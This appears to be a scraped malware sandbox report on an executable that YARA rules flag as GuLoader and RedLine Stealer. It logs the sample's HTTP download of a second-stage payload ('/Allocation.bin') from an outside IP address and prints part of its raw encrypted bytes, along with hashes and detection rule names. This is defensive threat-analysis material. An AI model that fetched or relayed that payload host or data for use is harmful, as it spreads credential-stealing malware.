                                                                                                                                            Dec 17, 2021 10:18:00.416475058 CET8049857185.112.83.8192.168.2.4

                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                            • 185.112.83.8

                                                                                                                                            HTTP Packets

                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            0192.168.2.449857185.112.83.880C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Dec 17, 2021 10:18:00.248809099 CET10556OUTGET /Allocation.bin HTTP/1.1
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                            Host: 185.112.83.8
                                                                                                                                            Cache-Control: no-cache
                                                                                                                                            Dec 17, 2021 10:18:00.303559065 CET10557INHTTP/1.1 200 OK
                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                            Last-Modified: Thu, 16 Dec 2021 20:39:39 GMT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            ETag: "7bfebfbbdf2d71:0"
                                                                                                                                            Server: Microsoft-IIS/10.0
                                                                                                                                            Date: Fri, 17 Dec 2021 09:17:57 GMT
                                                                                                                                            Content-Length: 190016
                                                                                                                                            Data Raw: aa a1 e2 d1 b8 a7 28 b5 43 6a 9b b7 2e 24 1b e7 24 02 eb 7c 9b be 24 b1 82 6c a6 98 c9 06 4e c0 40 80 92 3d f4 f2 ac 3e 2a 05 0d dc 90 3c e4 74 87 6e c1 9d ce 47 15 6f 23 75 94 fd 91 13 73 e7 7c e9 73 7d de 4a 1b 0d bc 73 75 33 86 11 c7 fe 6a 5c fb e6 66 e5 0c eb 4e 3e 7c b1 a0 c2 47 a7 76 1b f9 bd 6b f4 75 ed bf 10 89 97 86 03 e3 ed 2c 12 38 80 82 68 d1 b1 84 72 84 e5 9d fc e0 25 1e 30 de 9f 9b ef af 8b 1f 94 95 5f 36 77 66 33 02 9f a3 e3 39 d9 14 81 17 65 cd 40 91 f3 dd 46 1d 68 13 fa f6 39 bf 5b 81 6b f9 56 2e 7b 59 88 65 9a 2b 34 49 b8 61 42 bd 2c 8c 7e 47 56 18 d0 54 a9 9c a4 3b 2b 10 b8 c4 c0 f0 c1 0f a8 50 9b 76 82 8e 7a b7 e2 bd 97 57 4b a7 04 2e d3 a6 d5 4d 2e 4f 4c 28 95 0c 42 8c ef b8 a7 4e 0d 4d 29 30 02 25 5e f7 b2 75 cc 7e f1 99 fb 0d 9b cd 68 b5 79 ae 58 d3 0f 55 ba 5e 34 2d 82 04 ea 1a 7d e2 b7 9b 9a c2 b0 67 1e b3 45 61 1c ba d9 fc 07 c8 62 af 79 e7 bf ac 20 66 f4 b6 4d 60 3e cc 03 9e 80 09 d3 ae 76 a6 4d f2 54 72 4c 32 29 44 dd 15 bf 62 07 37 29 83 08 50 66 9b 1e 22 8d a2 12 a9 09 0b b5 57 8b c1 80 24 fb bb 4c 99 4f bb 1f 90 48 d4 63 d8 61 f4 ec 0c 36 88 2b 1f 0d af 31 ab 5e b5 df db d9 41 43 73 45 d7 05 4e da 0c 5e ae 67 ea 90 f6 30 95 90 77 ba 73 a3 7c cd ac 46 57 4e 01 a8 ed 9d 79 b2 65 35 55 cd 63 1b 45 68 d0 93 d5 6a a7 75 7c 00 de ae 25 a4 fa 6e 5f 31 a1 99 a8 34 7a ec fc 98 c8 7a 6e 32 e3 77 96 b3 83 85 bd c6 16 de ef 6b 89 0a 41 bd c3 44 17 27 82 01 59 ab c2 bd 6f df 2e 4c 09 ef 6b 06 e9 1a fc 46 15 26 ca bd 3b 01 de fa 94 fe bd 00 be f3 7f 4a d2 e9 6a c9 8c 96 40 10 b3 1d ec 6b 01 e0 23 af 7f a1 ef 81 33 ae e3 18 dd cf a0 ed 56 4a 93 8c 08 56 2a 61 b9 54 1e f2 ee 60 98 ba 77 80 aa b8 0f 59 91 9b 66 25 5c fc c1 c5 91 17 90 02 61 e6 3e ca a3 d9 08 af 81 6a ae ec 0b 3a d0 db a4 4e 5a ba ef 70 4c ad 3a 51 36 c9 56 91 27 4f 87 05 c9 6d ae d0 cb ec 86 a0 98 47 36 85 59 2f 28 8b 5e 17 43 7f 2b b6 f8 50 f8 7a d7 7d d8 e3 16 f8 41 b7 18 3c ac 02 f5 4a b8 53 ff 8e f1 0f 2f dc 87 6c 85 25 60 0c 66 63 92 1e 6b 2f 59 fd fd 9a c2 80 76 98 a7 87 04 ad 63 3d 5f 23 6f 13 b6 05 b8 f6 b0 f0 fe ec df 58 7f 98 89 d8 00 cf b3 06 77 9a ed 63 a3 96 15 95 b6 ec 11 ee 3e 61 81 a1 13 30 2a cc 0c 72 22 8f 8b 4a a5 33 07 6b 7e 7d 54 cd ea 90 44 26 03 8e bb c8 3b 44 57 6f 8e 0d 58 f0 dc 2e e4 30 d8 cf c7 e2 eb 18 2a d1 82 74 d1 59 e9 56 72 a6 46 12 c0 3a 9a 0e 66 40 e4 18 26 df b8 13 de cc 84 6f a3 d4 87 57 c5 b9 32 49 09 3e ff 77 58 ef e6 13 fe 7b 65 a2 6c c6 52 ef cb e3 55 e8 74 62 22 f5 b6 4b de b3 64 a7 77 c1 03 f1 e3 29 a7 05 c8 2e 2d 14 41 bf 22 24 58 44 f2 e0 2d 5b 70 48 a0 4f db 31 3e 03 a1 1d d2 a7 14 9d 6d ab 53 53 ed aa ba 2f df c4 77 d2 81 e2 c2 ee e7 38 64 36 d2 07 95 fa 31 31 b3 e3 7d dd 4a 1b 0d b8 73 75 33 79 ee c7 fe d2 5c fb e6 66 e5 0c eb 0e 3e 7c b1 a0 c2 47 a7 76 1b f9 bd 6b f4 75 ed bf 10 89 97 86 03 e3 ed 2c 12 38 80 82 68 d1 b1 84 72 84 e5 7d fc e0 25 10 2f 64 91 9b 5b a6 46 3e 2c 94 13 fb 56 32 5b 6b ec 83 93 4b b6 73 f3 76 08 ed 23 f0 9d b3 29 69 48 71 9f d6 4b ca 35 a1 02 97 76 6a 34 0a a8 08 f5 4f 51 67 b5 6c 48 99 2c 8c 7e 47 56 18 d0 3c b9 18 89 17 5a fa c6 e8 b1 1a bf 23 d9 ba e5 44 a1 f1 04 88 93 57 e9 5c fc 36 7a 05 a2 4c ab 61 5f a4 32 74 e4 e6 3c be cc d6 d9 52 7c a7 57 02 21 4c 20 55 c3 9f b2 4c d2 e2 85 20 ea 27 16 e7 10 cd 30 ff 7e bf c4 5e 34 2d 82 04 ea 1a 7d e2 b7 9b 11 86 94 63 33 21 f1 91
                                                                                                                                            Data Ascii: (Cj.$$|$lN@=>*<tnGo#us|s}Jsu3j\fN>|Gvku,8hr%0_6wf39e@Fh9[kV.{Ye+4IaB,~GVT;+PvzWK.M.OL(BNM)0%^u~hyXU^4-}gEaby fM`>vMTrL2)Db7)Pf"W$LOHca6+1^ACsEN^g0ws|FWNye5UcEhju|%n_14zzn2wkAD'Yo.LkF&;Jj@k#3VJV*aT`wYf%\a>j:NZpL:Q6V'OmG6Y/(^C+Pz}A<JS/l%`fck/Yvc=_#oXwc>a0*r"J3k~}TD&;DWoX.0*tYVrF:f@&oW2I>wX{elRUtb"Kdw).-A"$XD-[pHO1>mSS/w8d611}Jsu3y\f>|Gvku,8hr}%/d[F>,V2[kKsv#)iHqK5vj4OQglH,~GV<Z#DW\6zLa_2t<R|W!L UL '0~^4-}c3!


                                                                                                                                            Code Manipulations

                                                                                                                                            Statistics

                                                                                                                                            Behavior

                                                                                                                                            Click to jump to process

                                                                                                                                            System Behavior

                                                                                                                                            General

                                                                                                                                            Start time:10:15:44
                                                                                                                                            Start date:17/12/2021
                                                                                                                                            Path:C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:94872 bytes
                                                                                                                                            MD5 hash:66E3C71BCD364EB5CF19CB820683EF0C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.816118549.00000000029A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low

                                                                                                                                            General

                                                                                                                                            Start time:10:16:56
                                                                                                                                            Start date:17/12/2021
                                                                                                                                            Path:C:\Users\user\Desktop\mixfive_20211216-221155.exe
                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                            Commandline:"C:\Users\user\Desktop\mixfive_20211216-221155.exe"
                                                                                                                                            Imagebase:0x400000
                                                                                                                                            File size:94872 bytes
                                                                                                                                            MD5 hash:66E3C71BCD364EB5CF19CB820683EF0C
                                                                                                                                            Has elevated privileges:true
                                                                                                                                            Has administrator privileges:true
                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                            Yara matches:
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1006545439.0000000020590000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1004805288.000000001E100000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000003.945608436.0000000000A3F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000000.813287233.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1006136622.000000001F477000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.1006896564.0000000020B60000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.1005643076.000000001E7C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                            Reputation:low

                                                                                                                                            Disassembly

                                                                                                                                            Code Analysis

                                                                                                                                            Reset < >